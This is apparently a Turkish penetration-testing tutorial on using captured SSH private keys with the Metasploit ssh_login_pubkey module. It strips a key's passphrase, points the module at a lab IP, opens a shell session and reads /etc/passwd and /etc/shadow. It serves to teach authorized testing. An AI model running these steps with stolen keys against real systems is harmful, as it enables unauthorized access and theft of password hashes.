MSF ssh_login_pubkey Auxiliary Modülü ve Elde Edilen SSH Özel Anahtarları ile Linux Bilgisayarlara Komut Satırı Bağlantısının Elde Edilmesi

Linux sızma testleri sırasında, bir şekilde elde edilen SSH özel anahtarları (private key) kullanılarak SSH servisi açık olan diğer sistemlere sızılmaya çalışılır. Bu yazıda, elde edilen bir takım SSH özel anahtarları ve MSF ssh_login_pubkey auxiliary modülü ile ağda SSH servisi açık olan sistemlere erişim sağlanacaktır.

Sızma testleri sırasında “id_rsa_anahtari” adlı bir anahtar elde edilmiş olsun.

cd Desktop
ls -la id*
cat id_rsa_anahtari

 

Bu anahtar ile oturum açılabilecek sistemlere erişimler için kullanılabilecek MSF ssh_login_pubkey auxiliary modülünün özellikleri incelenir.

search ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
show options

 

Bu modül parola koruması olan özel anahtarları kabul etmemektedir. Bu sebeple parolası olan özel anahtarların parolası kaldırılmalıdır.

ls -la id*
cat id_rsa_anahtari

 

Parola kaldırılması için ssh-keygen aracı kullanılabilir:

ssh-keygen -p -f /root/Desktop/id_rsa_anahtari

 

Modülün seçenekleri ayarlanır:

set RHOSTS 100.100.200.7
set USERNAME yenikullanici
set KEY_PATH /root/Desktop/id_rsa_anahtari

 

Not: KEY_PATH seçeneğine dizin de verilebilir. Ancak false pozitif durumlar çıkabilmektedir.

Modül çalıştırıldığında erişim sağlanabilecek IP’lere bağlantı açıkmış olur.

run

 

Bu bağlantı erişim sağlanan kullanıcının yetkileri ile gerçekleşir.

sessions -l
sessions -i 1
id
cat /etc/passwd | head -5
cat /etc/shadow | head -5